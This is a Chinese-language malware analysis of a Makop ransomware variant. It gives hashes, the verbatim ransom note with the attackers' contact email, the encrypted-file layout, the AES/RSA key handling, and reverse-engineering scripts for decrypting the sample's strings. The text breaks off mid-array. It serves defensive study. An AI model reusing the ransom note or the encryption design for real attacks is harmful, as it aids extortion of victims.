【病毒分析】揭秘.mkp后缀勒索病毒!Makop家族变种如何进行可视化加密?

时间: 2024-11-22 00:31:14 浏览量:94

1.背景

1.1 makop家族介绍

  Makop 勒索软件首次出现于 2020 年 1 月,由一个名为“Makop”的用户在多个暗网论坛(如 Exploit、XSS、Blackhacker、WWH-Club、Dublikat、Migalki、Tenec 和 Rutor)上进行推广。该用户推出了 Makop 的勒索软件即服务(RaaS)计划,并积极寻找合作伙伴进行分发与扩展。

1.2 首次出现时间

  2020年1月

1.3 加密器特征

  Makop 勒索软件的加密器设计独特,包含一个图形用户界面(GUI),其中的某些样本已被 Stroz Friedberg 团队在 VirusTotal 上检测到。该加密器在执行时会动态解密字符串,这一特性增加了静态分析的难度。解密的内容包含库名称、API 名称、运行时使用的字符串,以及勒索软件提示信息等重要内容。

  在使用带 GUI 的加密器时,攻击者可以选择特定文件夹或整个系统进行加密。该加密器会生成一个 8 位的系统专属识别号,并将其附加到加密文件的文件名中。此识别号是通过 Windows 产品 ID 和卷序列号生成的。

  加密器的 GUI 提供了以下几个选项:

   Quick:仅对目标文件的前 40K 字节进行加密,从而加速加密过程。

   Net: 针对网络共享进行加密。

   Delete: 删除加密器

2.恶意文件基础信息

2.1 加密器基本信息

文件名:mkp_visual.exe
编译器:Microsoft Visual C/C++(14.00.50727)LTCG/C++
大小:89.50KB
操作系统:Windows(95)
架构:I386
模式:32 位
类型:GUI
字节序:LE
MD5:d24ad02799acc28d3e93b2f2389289c6
SHA1:da837c7f6048bd97d872acec9b51d8c9781cd293
SHA256:f3d6caac373fe93c5b0e688d44f17f2eac9f782f3bd26702ca54ab15538317c6

2.2 勒索信

   +README-WARNING+.txt

::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: sspdlk00036@cock.li

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don抰 want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.



:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.

3.加密后文件分析

3.1 威胁分析

病毒家族Makop
首次出现时间/捕获分析时间2024/11/01\ 2024/11/04
威胁类型勒索软件,加密病毒
加密文件扩展名sspdlk00036@cock.li.mkp
勒索信文件名+README-WARNING+.txt
有无免费解密器?
联系邮箱sspdlk00036@cock.li
检测名称Avast (Win32:Malware-gen), AhnLab-V3 (Trojan/Win.Generic.C5576951), ALYac (Gen:Variant.Tedy.512515), Avira (no cloud) (TR/Ransom.imrnt), BitDefenderTheta (Gen:NN.ZexaF.36802.yq0@aSdxC8m), CrowdStrike Falcon (Win/malicious_confidence_100% (W)),Cylance(Unsafe),DeepInstinct(MALICIOUS),Emsisoft(Gen:Variant.Tedy.512515 (B)),ESET-NOD32(A Variant Of MSIL/Filecoder.LU),GData(Gen:Variant.Tedy.512515), Ikarus (Trojan.MSIL.Crypt),K7GW(Trojan ( 0052f4e41 ))
感染症状无法打开存储在计算机上的文件,以前功能的文件现在具有不同的扩展名(例如,solar.docx.locked)。桌面上会显示一条勒索要求消息。网络犯罪分子要求支付赎金(通常以比特币)来解锁您的文件。
感染方式受感染的电子邮件附件(宏)、恶意广告、漏洞利用、恶意链接
受灾影响所有文件都经过加密,如果不支付赎金就无法打开。其他密码窃取木马和恶意软件感染可以与勒索软件感染一起安装。

3.2 加密的测试文件

3.2.1 文件名

   sierting.txt

3.2.2 文件大小

   0x228 字节

3.2.3 具体内容

3.3 加密特征

3.3.1 加密文件名特征

  加密文件名 = 原始文件名+加密后缀 ,例如:sierting.txt.sspdlk00036@cock.li.mkp

3.3.2 加密数据特征

   文件大小 < = 0x40000字节(全加密)

   文件原始大小+0~16字节不定长的填充数据+8个字节的\xff+不定长的文件名称结构的加密数据+4字节的文件名称结构的加密数据长度+16字节的IV + 128字节的RSA加密的AES密钥 + 4字节的固定值 + 4字节的加密标志

  文件大小 > 0x40000字节(部分加密)

   0x40000大小的加密数据 + 文件剩余原始数据 + 不定长的文件名称结构的加密数据+4字节的文件名称结构的加密数据长度+16字节的IV + 128字节的RSA加密的AES密钥+ 4字节的固定值 + 4字节的加密标志

3.3.3 加密算法

  文件加密使用了AES-CBC加密算法,对于文件加密所使用的KEY采用了RSA加密。

  程序内字符串的解密用到了AES-ECB加密算法。

3.3.3.1 AES密钥生成

KEY

  由produce_random_key函数生成,具体实现可以看密钥生成部分的分析,这里取部分实现

  可以看到KEY主要是32位的随机数,随机数生成器是CryptGenRandom函数

IV

  这部分可以看文件加密部分,具体实现可以看文件加密部分的分析,IV主要由produce_random函数生成,这里取部分实现:

  可以看到IV是一串16字节的随机数,随机数生成器是CryptGenRandom函数

3.3.3.2 RSA密钥生成

公钥

  由字符串解密便宜标志'0xa'解密得来,自带BLOB结构,如下:

0602000000a400005253413100040000010001001d35622bcfbcfe4fde59eae15c05d7528d0c1ae6755c180904dd745cd1f5a19986fce1e0e9534595e4fb7bdd6d5cc1f2cee684851bfc59529108c433185cf76c800f421aad345aa6a964e8f485acf1d3965c85654b124257e0142269eab809af68692309843ce7cd4fa8bf3124926f0403a7502abbecfa2ba7504e63a958e7bd000000000000000000000000

3.3.4 加密器释放文件

3.3.4.1 勒索信(+README-WARNING+.txt)

文件内容
::: Greetings :::

Little FAQ:

.1. 
Q: Whats Happen?
A: Your files have been encrypted. The file structure was not damaged, we did everything possible so that this could not happen.

.2. 
Q: How to recover files?
A: If you wish to decrypt your files you will need to pay us.

.3. 
Q: What about guarantees?
A: Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will cooperate with us. Its not in our interests.
To check the ability of returning files, you can send to us any 2 files with SIMPLE extensions(jpg,xls,doc, etc... not databases!) and low sizes(max 1 mb), we will decrypt them and send back to you. That is our guarantee.

.4.
Q: How to contact with you?
A: You can write us to our mailbox: sspdlk00036@cock.li

.5.
Q: How will the decryption process proceed after payment?
A: After payment we will send to you our scanner-decoder program and detailed instructions for use. With this program you will be able to decrypt all your encrypted files.

.6.
Q: If I don抰 want to pay bad people like you?
A: If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause only we have the private key. In practice - time is much more valuable than money.



:::BEWARE:::
DON'T try to change encrypted files by yourself! 
If you will try to use any third party software for restoring your data or antivirus solutions - please make a backup for all encrypted files!
Any changes in encrypted files may entail damage of the private key and, as result, the loss all data.
成分分析

   勒索信的全部信息都是由字符串解密偏移标志'0x8'解密得来,跟加密的ID无任何关系。

3.3.4.2 勒索壁纸(xxx.tmp.bmp)

文件内容

成分分析

  由字符串解密偏移标志'0x3a'解密得来的字符串“Your files were encrypted!”,绘制在制定画布上得来。

4.逆向分析

4.1 加密器逆向分析

4.1.1 程序入口

  打开程序发现开头首先调用了sub_407A90函数来实现对执行用户权限的检查之后又调用了sub_4077D0函数对执行参数做了校验,接着调用init_enc_obj函数实现初始化加密对象和解密了部分字符串,最后根据前面的条件进行判断是否是管理员权限并且输入的参数是否合规,如果不合规则退出。

  在完成了上述的校验后,将调用Init_GUI函数来显示程序窗口来根据用户需求来触发各种的事件。

4.1.2 检查启动权限(sub_407A90函数)

  这里是比较常规的Check管理员的实现

4.1.3 检查启动参数(sub_4077D0函数)

  这里主要检查了一下输入的启动参数,然后根据参数是否存在和值来返回固定的值:

   返回值为0:无参数

   返回值为1:参数为e

   返回值为2:参数为n+一串数字

4.1.4 解密字符串(sub_402950函数)

4.1.4.1 逻辑分析

  这里算是整个程序遇到的第一个算法,这里可以随便找一个,都可以看到,字符串的解密操作都是根据该标志来进行的,第一个标志对应着一串字符,也算是Phobos家族系列的经典操作之一。

  在分析了多个版本的Phobos变种,都可以看到,每个版本的字符串解密都不太一样,而我们这个版本的Phobos变种采用的依旧是AES256加密算法ECB模式的解密方式,但是很明显是自己写的,进入到函数内部可以通过导入密钥的Blob结构部分可以得知具体的加密类型和算法模式等信息。

  开始分析,首先从外部调用可以看到,依旧是比较常见的偏移标志的查找,根据偏移标志来找寻对应的字符串的长度和密文位置。

  进入函数内部可以看到,首先就是初始化加密密钥,这里主要运用CryptAcquireContextW来进行初始化加密类型,0x18代表设定加密类型为PROV_RSA_AES,然后下面调用CryptImportKey来导入加密密钥,其中在导入密钥前会存在一个**Blob的结构,**具体的加密类型可以依靠该结构进行识别。

  AES密钥(解密字符串):

8C93C36117EE77655080C789D0B92C73C91F1FDA560942CA72AA3DB5AC4CACB1

  在完成了加密密钥的导入后,就该解密密文数据了

  这里我们写一个IDA Python脚本将数据和标志全部提取出来:

import idautils
import idaapi
import idc


addr = 0x41F000
sum_cipher = []
for i in range(0,0x2d):
    data_addr = addr+8*i
    data = hex(idc.read_dbg_byte(data_addr))
    len = idc.read_dbg_word(data_addr+4)-idc.read_dbg_word(data_addr+2)
    cipher = []
    for k in range(0,len):
        cipher_data_addr = addr+idc.read_dbg_word(data_addr+2)+k
        cipher.append(idc.read_dbg_byte(cipher_data_addr))
    sum_cipher.append(cipher)
    print(data,cipher)
    print('-'*100)

  然后处理一下数据(从标志0开始),构造一个C++脚本来实现对数据的解密:

#include <windows.h>
#include <wincrypt.h>
#include <iostream>
#include <vector>
#include <sstream>
#include <iomanip>
void PrintHex(const std::vector<BYTE>& data) {
    std::cout << "Hex: ";
    for (BYTE b : data) {
        std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)b;
    }
    std::cout << std::endl;
}

int main() {
    HCRYPTPROV hProv = NULL;
    HCRYPTKEY hKey = NULL;
    if (!CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        std::cout << "Failed to acquire crypto context!" << std::endl;
        return 1;
    }
    unsigned char key[32] = {
        0x8C, 0x93, 0xC3, 0x61, 0x17, 0xEE, 0x77, 0x65, 0x50, 0x80,
        0xC7, 0x89, 0xD0, 0xB9, 0x2C, 0x73, 0xC9, 0x1F, 0x1F, 0xDA,
        0x56, 0x09, 0x42, 0xCA, 0x72, 0xAA, 0x3D, 0xB5, 0xAC, 0x4C,
        0xAC, 0xB1
    };
    struct {
        BLOBHEADER hdr;
        DWORD keySize;
        BYTE keyData[32];
    } keyBlob;
    keyBlob.hdr.bType = PLAINTEXTKEYBLOB;
    keyBlob.hdr.bVersion = CUR_BLOB_VERSION;
    keyBlob.hdr.reserved = 0;
    keyBlob.hdr.aiKeyAlg = CALG_AES_256;
    keyBlob.keySize = 32;
    memcpy(keyBlob.keyData, key, 32);
    std::vector<std::string> sign_list = { "0x0", "0x1", "0x4", "0x5", "0x6", "0x7", "0x8", "0x9", "0xa", "0xc", "0xe", "0xf", "0x10", "0x11", "0x12", "0x13", "0x14", "0x16", "0x17", "0x18", "0x19", "0x1a", "0x1b", "0x1e", "0x1f", "0x20", "0x21", "0x22", "0x23", "0x24", "0x25", "0x26", "0x27", "0x28", "0x29", "0x2a", "0x2b", "0x2c", "0x33", "0x36", "0x37", "0x38", "0x39" ,"0x3a"};;
    std::vector<std::vector<BYTE>> cipher_list = { 
        {84, 193, 164, 131, 219, 130, 47, 108, 192, 20, 48, 116, 31, 202, 206, 31, 45, 132, 42, 178, 65, 215, 203, 28, 93, 184, 43, 117, 78, 237, 248, 206}, {205, 64, 217, 196, 63, 9, 44, 9, 32, 203, 49, 156, 87, 2, 229, 192, 14, 183, 145, 174, 109, 239, 47, 175, 41, 89, 206, 231, 223, 102, 191, 13, 255, 204, 188, 186, 210, 176, 6, 8, 110, 232, 254, 109, 118, 217, 78, 57, 158, 125, 43, 169, 138, 255, 110, 33, 149, 64, 176, 49, 153, 106, 79, 208}, 
        {115, 228, 119, 26, 133, 194, 217, 50, 140, 71, 43, 242, 116, 74, 143, 37, 208, 175, 234, 92, 156, 221, 229, 239, 183, 235, 157, 27, 197, 252, 116, 193, 129, 8, 105, 72, 249, 190, 174, 42, 85, 197, 181, 37, 184, 148, 156, 79, 16, 180, 57, 73, 69, 57, 244, 223, 183, 5, 172, 121, 226, 104, 8, 207, 104, 149, 188, 150, 207, 173, 233, 11, 182, 16, 16, 96, 226, 157, 113, 183, 191, 75, 238, 170, 44, 115, 0, 215, 213, 227, 94, 153, 62, 19, 15, 245, 102, 108, 148, 54, 79, 141, 48, 109, 69, 25, 169, 99, 210, 62, 139, 58, 52, 38, 195, 4, 125, 77, 253, 132, 136, 83, 163, 202, 174, 61, 177, 136, 170, 162, 186, 37, 195, 209, 93, 172, 38, 223, 26, 194, 101, 55, 249, 168, 208, 58, 190, 123, 56, 115, 1, 227, 50, 223, 107, 220, 31, 168, 173, 133, 171, 179, 82, 15, 10, 127, 251, 173, 187, 49, 213, 191, 149, 201, 93, 54, 187, 124, 207, 180, 186, 26, 55, 212, 102, 29, 97, 215, 76, 198, 188, 17},
        {222, 55, 116, 106, 205, 240, 172, 80, 144, 36, 154, 125, 243, 40, 137, 67, 242, 106, 3, 192, 230, 18, 88, 45, 138, 203, 130, 141, 255, 206, 44, 196, 102, 200, 233, 123, 44, 15, 163, 29, 159, 34, 139, 36, 233, 181, 55, 138, 73, 231, 255, 89, 123, 127, 226, 171, 187, 66, 102, 214, 42, 138, 31, 146, 24, 220, 180, 89, 206, 36, 47, 58, 169, 128, 102, 212, 139, 165, 184, 246, 242, 203, 51, 33, 247, 235, 206, 147, 165, 134, 240, 14, 97, 152, 221, 55, 72, 204, 140, 107, 155, 57, 33, 147, 169, 23, 61, 86, 34, 160, 138, 160, 53, 122, 51, 154, 19, 108, 152, 195, 74, 243, 64, 81, 231, 96, 235, 61, 222, 207, 140, 216, 39, 79, 16, 124, 117, 85, 195, 237, 174, 50, 49, 169, 21, 157, 216, 39, 175, 185, 87, 175, 185, 78, 225, 68, 131, 211, 161, 5, 199, 178, 175, 110, 57, 43, 202, 237, 8, 38, 229, 175, 240, 221, 234, 22, 113, 33, 159, 75, 206, 161, 164, 199, 129, 6, 15, 146, 198, 218, 102, 66, 238, 102, 84, 67, 21, 62, 5, 74, 189, 47, 246, 126, 25, 197, 166, 136, 150, 180, 237, 145, 15, 14, 81, 83, 28, 131, 178, 6, 116, 71, 129, 10, 48, 74, 174, 74, 179, 248, 134, 41, 225, 100, 161, 133, 65, 16, 176, 249, 209, 89, 212, 4, 73, 131, 128, 140, 185, 190, 80, 204, 214, 41, 183, 208, 61, 130, 53, 115, 177, 246, 27, 174, 13, 127, 218, 158, 42, 63, 201, 237, 22, 201, 231, 92, 9, 151, 180, 165, 113, 66, 57, 4, 153, 102, 56, 239, 24, 136, 195, 251, 23, 99, 99, 112, 139, 221, 39, 9, 225, 168, 220, 107, 210, 95, 127, 83, 6, 156, 124, 60, 246, 100, 54, 194, 110, 59, 227, 65, 232, 39, 119, 177, 195, 89, 172, 148, 229, 131, 92, 47, 52, 169, 2, 77, 223, 179, 233, 41, 21, 204, 0, 85, 160, 103, 243, 112, 213, 70, 174, 248, 255, 28, 176, 17, 114, 204, 152, 97, 250, 181, 127, 84, 49, 236, 52, 4, 207, 141, 234, 22, 20, 12, 151, 241, 143, 113, 219, 207, 216, 45, 199, 218, 235, 12, 142, 161, 97, 62, 208, 19, 82, 179, 109, 119, 184, 213, 216, 222, 23, 29, 192, 79, 127, 209, 111, 155, 171, 133, 110, 254, 188, 75, 22, 117, 33, 166, 105, 146, 230, 134, 184, 233, 46, 110, 150, 94, 222, 27, 250, 42, 141, 230, 24, 173, 165, 11, 46, 80, 101, 140, 74, 190, 118, 157, 133, 133, 111, 69, 211, 96, 83, 148, 160, 230, 148, 96, 104, 79, 204, 164, 9, 119, 33, 189, 150, 180, 206, 83, 201, 149, 17, 111, 15, 19, 130, 169, 253, 16, 178, 47, 242, 181, 203, 111, 250, 156, 212, 177, 157, 44, 44, 228, 76, 61, 203, 146, 68, 127, 156, 10, 0, 121, 113, 32, 254, 96, 115, 249, 208, 239, 251, 146, 179, 26, 6, 99, 22, 46, 255, 175, 121, 42, 5, 223, 234, 145, 115, 201, 199, 155, 76, 76, 244, 5, 39, 97, 249, 52, 71, 52, 23, 235, 255, 187, 194, 0, 52, 239, 14, 158, 34, 206, 51, 255, 167, 208, 121, 36, 70, 7, 147, 100, 122, 46, 105, 219, 244, 212, 77, 137, 205, 241, 61, 23, 247, 184, 247, 16, 22, 238, 176, 33, 171, 13, 250, 131, 18, 28, 189, 226, 86, 219, 21, 90, 99, 238, 212, 7, 58, 7, 225, 187, 159, 115, 67, 136, 87, 111, 131, 46, 99, 209, 80, 45, 64, 163, 104, 40, 29, 84, 238, 36, 150, 1, 18, 5, 10, 69, 160, 220, 38, 216, 237, 232, 225, 18, 246, 104, 39, 54, 58, 83, 88, 109, 61, 228, 77, 188, 14, 206, 25, 15, 172, 135, 69, 24, 75, 85, 42, 17, 109, 132, 235, 52, 113, 5, 222, 33, 38, 241, 229, 76, 235, 221, 227, 52, 0, 196, 130, 239, 73, 130, 254, 70, 102, 230, 145, 84, 94, 76, 190, 140, 220, 34, 113, 202, 141, 77, 141, 80, 161, 94, 111, 124, 118, 63, 124, 91, 211, 45, 178, 205, 64, 159, 155, 157, 30, 69, 242, 141, 225, 107, 207, 122, 56, 221, 96, 69, 168, 56, 131, 176, 30, 69, 95, 78, 38, 139, 48, 203, 14, 133, 166, 61, 8, 86, 217, 70, 158, 73, 153, 172, 52, 13, 210, 249, 252, 106, 119, 245, 87, 4, 247, 198, 35, 138, 162, 251, 164, 201, 40, 13, 33, 27, 101, 114, 228, 167, 182, 62, 47, 79, 36, 18, 116, 237, 159, 181, 244, 147, 7, 77, 228, 144, 171, 236, 249, 110, 237, 118, 67, 84, 8, 141, 11, 40, 122, 163, 163, 111, 88, 221, 251, 133, 158, 159, 139, 119, 109, 119, 223, 212, 2, 112, 152, 253, 133, 245, 209, 62, 203, 255, 24, 91, 4, 123, 104, 212, 253, 13, 164, 58, 48, 233, 37, 14, 201, 209, 177, 47, 59, 162, 223, 210, 15, 119, 86, 69, 174, 151, 201, 55, 45, 5, 142, 252, 215, 79, 25, 187, 230, 157, 238, 30, 222, 176, 233, 147, 156, 235, 120, 13, 177, 53, 80, 21, 99, 147, 199, 93, 95, 18, 3, 50, 48, 92, 227, 81, 102, 102, 227, 255, 58, 167, 101, 200, 142, 189, 166, 54, 162, 189, 123, 233, 50, 67, 26, 236, 144, 200, 23, 2, 159, 147, 17, 158, 111, 149, 11, 160, 99, 60, 0, 47, 163, 107, 70, 107, 59, 100, 0, 141, 1, 134, 104, 30, 221, 110, 109, 103, 243, 243, 229, 236, 185, 252, 69, 196, 229, 0, 198, 35, 222, 28, 253, 193, 234, 124, 60, 196, 255, 192, 240, 45, 70, 51, 186, 43, 55, 161, 230, 103, 236, 245, 226, 61, 153, 10, 246, 149, 111, 88, 191, 230, 101, 144, 116, 13, 46, 53, 123, 34, 135, 27, 24, 107, 255, 57, 132, 133, 63, 102, 255, 136, 149, 166, 243, 150, 60, 169, 172, 11, 114, 138, 58, 77, 93, 64, 44, 166, 17, 67, 126, 137, 23, 145, 45, 234, 4, 109, 192, 153, 75, 124, 17, 98, 168, 226, 71, 164, 114, 209, 16, 57, 232, 173, 136, 220, 147, 205, 162, 79, 66, 247, 220, 14, 187, 122, 120, 152, 11, 71, 129, 242, 196, 178, 51, 102, 21, 51, 127, 203, 124, 227, 6, 221, 52, 90, 214, 222, 139, 147, 239, 199, 228, 177, 26, 160, 47, 107, 39, 101, 59, 144, 213, 61, 251, 152, 233, 185, 28, 126, 91, 197, 182, 16, 199, 26, 44, 93, 147, 212, 123, 184, 253, 253, 195, 51, 13, 53, 19, 144, 130, 92, 65, 221, 229, 90, 40, 88, 152, 29, 103, 180, 82, 225, 206, 221, 159, 83, 125, 131, 141, 215, 64, 190, 97, 128, 241, 143, 187, 47, 128, 154, 71, 165, 40, 177, 97, 218, 203, 45, 94, 87, 7, 110, 6, 32, 117, 50, 68, 46, 170, 212, 29, 81, 157, 191, 52, 113, 212, 28, 138, 9, 206, 152, 216, 251, 31, 8, 81, 237, 75, 189, 111, 15, 202, 14, 45, 199, 181, 65, 17, 3, 8, 78, 116, 72, 38, 139, 114, 82, 106, 41, 4, 70, 4, 159, 100, 109, 200, 197, 169, 232, 149, 136, 112, 133, 82, 175, 203, 162, 56, 96, 140, 81, 56, 198, 251, 198, 107, 238, 150, 33, 154, 15, 193, 150, 187, 152, 100, 193, 216, 208, 89, 57, 147, 212, 13, 64, 147, 53, 46, 10, 45, 108, 87, 157, 57, 129, 209, 222, 71, 216, 29, 17, 107, 212, 124, 196, 87, 210, 139, 11, 158, 106, 208, 230, 127, 211, 219, 176, 39, 114, 5, 101, 45, 145, 117, 47, 123, 249, 94, 80, 154, 228, 196, 126, 114, 164, 91, 127, 250, 21, 195, 247, 46, 207, 14, 117, 113, 131, 167, 224, 112, 218, 104, 231, 215, 108, 193, 147, 129, 185, 237, 26, 83, 106, 197, 190, 93, 246, 252, 42, 123, 111, 236, 102, 238, 14, 158, 58, 62, 206, 107, 11, 96, 103, 188, 210, 178, 49, 181, 197, 144, 115, 28, 240, 132, 225, 153, 189, 164, 57, 251, 180, 224, 124, 29, 19, 113, 168, 12, 73, 15, 163, 169, 119, 220, 129, 238, 160, 227, 42, 240, 228, 71, 226, 174, 59, 16, 140, 160, 91, 244, 130, 39, 208, 75, 97, 216, 174, 143, 87, 75, 65, 194, 94, 217, 201, 67, 63, 34, 229, 240, 192, 73, 64, 142, 145, 124, 209, 71, 183, 163, 153, 87, 70, 160, 105, 172, 222, 193, 117, 234, 253, 146, 211, 141, 52, 97, 58, 226, 103, 104, 8, 139, 137, 164, 243, 107, 223, 57, 142, 247, 250, 7, 33, 196, 98, 167, 195, 169, 172, 245, 55, 40, 120, 106, 167, 213, 139, 153, 48, 25, 156, 80, 40, 109, 175, 101, 205, 232, 184, 252, 156, 140, 36, 144, 225, 160, 180, 162, 178, 204, 192, 174, 189, 97, 236, 191, 14, 82, 142, 30, 141, 117, 79, 197, 208, 70, 58, 205, 227, 219, 137, 245, 170, 202, 16, 174, 20, 143, 218, 253, 235, 21, 231, 181, 226, 74, 207, 206, 137, 190, 113, 234, 115, 163, 111, 17, 156, 213, 13, 205, 14, 120, 26, 214, 18, 171, 117, 162, 255, 137, 250, 93, 235, 48, 126, 234, 49, 73, 216, 81, 206, 141, 35, 86, 55, 24, 118, 42, 128, 53, 213, 85, 253, 76, 185, 12, 230, 52, 37, 241, 172, 166, 36, 191, 168, 168, 156, 24, 228, 14, 255, 146, 237, 245, 164, 118, 15, 224, 198, 192, 29, 70, 212, 48, 27, 130, 192, 73, 199, 117, 18, 204, 216, 51, 190, 144, 171, 32, 103, 172, 12, 2, 194, 243, 231, 79, 148, 46, 193, 88, 195, 198, 165, 203, 242, 144, 225, 32, 6, 140, 219, 161, 224, 208, 211, 98, 7, 102, 117, 169, 241, 54, 122, 57, 245, 164, 66, 42, 158, 40, 45, 101, 218, 27, 112, 30, 6, 204, 104, 90, 83, 210, 151, 42, 71, 230, 110, 163, 69, 86, 230, 48, 100, 24, 249, 140, 103, 179, 187, 23, 40, 255, 144, 6, 152, 7, 86, 246, 99, 37, 169, 48, 53, 106, 234, 202, 172, 51, 95, 195, 166, 50, 208, 0, 146, 37, 75, 77, 131, 123, 223, 185, 197, 101, 54, 143, 63, 92, 194, 255, 67, 6, 22, 194, 133, 8, 199, 59, 87, 204, 206, 239, 8, 85, 91, 67, 42, 173, 231, 27, 178, 37, 40, 88, 61, 185, 156, 176, 236, 98, 167, 191, 128, 226, 168, 97, 9, 62, 71, 241, 26, 142, 7, 9, 169, 126, 33, 138, 215, 169, 55, 122, 38, 138, 50, 71, 90, 11, 175, 158, 16, 66, 34, 218, 133, 162, 225, 126, 86, 12, 40, 95, 120, 233, 242, 123, 215, 73, 167, 19, 147, 131, 151, 224, 186, 83, 227, 7, 214, 113, 229, 37, 223, 10, 66, 61, 237, 151, 36, 196, 174, 158, 118, 144, 42, 37, 169, 241, 172, 255, 61, 211, 201, 82, 254, 210, 144, 201, 123, 254, 190, 155, 227, 92, 11, 118, 220, 191, 98, 57, 249, 209, 241, 135, 31, 55, 164, 161, 158, 135, 46, 71, 213, 37, 60, 38, 39, 84, 55, 251, 52, 141, 188, 225, 38, 100, 152, 48, 7, 149, 193, 31, 222, 126, 211, 117, 90, 89, 129, 156, 57, 110, 21, 127, 248, 107, 83, 65, 49, 34, 225, 142, 54, 240, 137, 252, 57, 180, 208, 92, 161, 72, 16, 234, 11, 123, 230, 255, 18, 7, 220, 46, 48, 78, 103, 216, 153, 242, 153, 79, 17, 104, 90, 202, 0, 145, 122, 205, 196, 28, 159, 81, 141, 15, 115, 165, 220, 46, 181, 0, 122, 35, 154, 195, 173, 42, 14, 157, 241, 253, 170, 176, 232, 91, 81, 173, 0, 17, 198, 93, 26, 62, 65, 226, 102, 162, 25, 183, 235, 1, 36, 210, 196, 114, 228, 109, 148, 179, 122, 156, 128, 144, 71, 93, 77, 147, 5, 155, 204, 165, 147, 233, 238, 248, 103, 122, 173, 110, 21, 184, 98, 165, 216, 53, 27, 180, 28, 148, 200, 166, 59, 43, 142, 10, 17, 115, 247, 222, 137, 200, 167, 254, 164, 33, 75, 78, 44, 1, 156, 120, 9, 142, 218, 53, 177, 154, 149, 148, 140, 184, 254, 244, 48, 202, 226, 67, 59, 29, 168, 39, 225, 193, 122, 213, 225, 217, 66, 50, 160, 96, 133, 133, 220, 110, 232, 166, 33, 104, 90, 225, 181, 248, 59, 138, 44, 91, 229, 191, 21, 36, 173, 47, 245, 200, 37, 144, 32, 78, 11, 109, 127, 2, 98, 108, 62, 36, 83, 174, 68, 60, 109, 204, 232, 112, 115, 69, 130, 17, 46, 180, 61, 42, 158, 81, 48, 133, 137, 70, 124, 253, 37, 105, 130, 88, 239, 151, 85, 190, 146, 23, 240, 100, 71, 24, 237, 49, 254, 27, 206, 203, 247, 129, 198, 165, 15, 131, 14, 141, 91, 40, 149, 88, 64, 200, 62, 11, 167, 134, 193, 86, 203, 139, 227, 10, 243, 175, 122, 248, 3, 252, 155, 136, 137, 75, 187, 30, 54, 209, 137, 107, 14, 73, 187, 82, 246, 108, 57, 236, 179, 115, 127, 3, 236, 49, 133, 41, 217, 157, 41, 91, 106, 56, 102, 157, 62, 32, 42, 124, 185, 189, 76, 68, 158, 61, 162, 159, 24, 14, 158, 69, 164, 222, 213, 250, 156, 43, 27, 199, 96, 234, 148, 90, 228, 162, 90, 223, 1, 136, 117, 65, 142, 175, 14, 108, 76, 58, 185, 179, 138, 99, 18, 150, 178, 215, 121, 240, 98, 172, 62, 154, 8, 212, 104, 96, 111, 97, 169, 31, 137, 179, 156, 120, 145, 242, 222, 163, 59, 201, 0, 194, 24, 210, 225, 59, 191, 118, 68, 22, 223, 22, 56, 43, 24, 46, 145, 251, 127, 227, 74, 86, 105, 48, 11, 50, 223, 175, 107, 223, 210, 193, 39, 126, 5, 149, 158, 84, 240, 71, 140, 244, 19, 74, 53, 252, 81, 26, 43, 241, 44, 54, 242, 4, 169, 129, 120, 106, 131, 2, 41, 223, 60, 67, 222, 243, 212, 105, 188, 99, 220, 41, 30, 76, 189, 114, 65, 40, 41, 128, 96, 206, 211, 55, 252, 60, 188, 125, 155, 210, 31, 165, 192, 82, 204, 143, 130, 225, 75, 85, 152, 43, 167, 88, 151, 121, 170, 137, 47, 169, 227, 105, 228, 91, 210, 24, 155, 237, 204, 1, 6, 206, 213, 45, 60, 135, 36, 134, 108, 207, 153, 0, 29, 164, 131, 186, 152, 248, 185, 46, 115, 163, 99, 244, 67, 209, 122, 74, 56, 187, 227, 182, 90, 85, 57, 108, 223, 239, 77, 28, 209, 158, 138, 222, 162, 103, 28, 122, 101, 105, 140, 176, 1, 70, 136, 62, 60, 48, 67, 108, 239, 49, 145, 111, 61, 145, 182, 107, 53, 55, 32, 101, 96, 210, 252, 181, 194, 196, 66, 177, 166, 156, 140, 114, 60, 62, 150, 92, 247, 186, 0, 105, 206, 99, 217, 164, 185, 124, 97, 227, 143, 100, 14, 159, 226, 95, 3, 237, 221, 176, 252, 74, 143, 42, 164, 74, 215, 236, 144, 185, 173, 159, 188, 11, 170, 155, 203, 73, 134, 17, 196, 197, 252, 241, 157, 52, 250, 55, 34, 110, 92, 119, 254, 197, 54, 193, 194, 68, 130, 226, 28, 238, 162, 38, 252, 34, 33, 210, 75, 48, 204, 168, 135, 23, 104, 75, 103, 242, 131, 84, 230, 72, 70, 167, 97, 9, 101, 175, 63, 86, 232, 186, 80, 92, 248, 22, 15, 202, 18, 245, 54, 127, 149, 101, 20, 97, 17, 203, 86, 130, 91, 14, 104, 164, 225, 190, 155, 36, 203, 243, 187, 83, 16, 30, 241, 98, 93, 145, 37, 42, 141, 41, 89, 113, 178, 201, 147, 149, 149, 137, 188, 92, 195, 211, 218, 92, 37, 60, 61, 165, 198, 159, 229, 99, 25, 211, 171, 134, 60, 127, 223, 156, 51, 138, 181, 151, 140, 233, 10, 44, 104, 228, 218, 113, 174, 57, 67, 248, 157, 229, 252, 234, 124, 145, 186, 157, 198, 226, 95, 155, 169, 97, 204, 240, 18, 34, 153, 235, 7, 93, 161, 199, 147, 50, 195, 244, 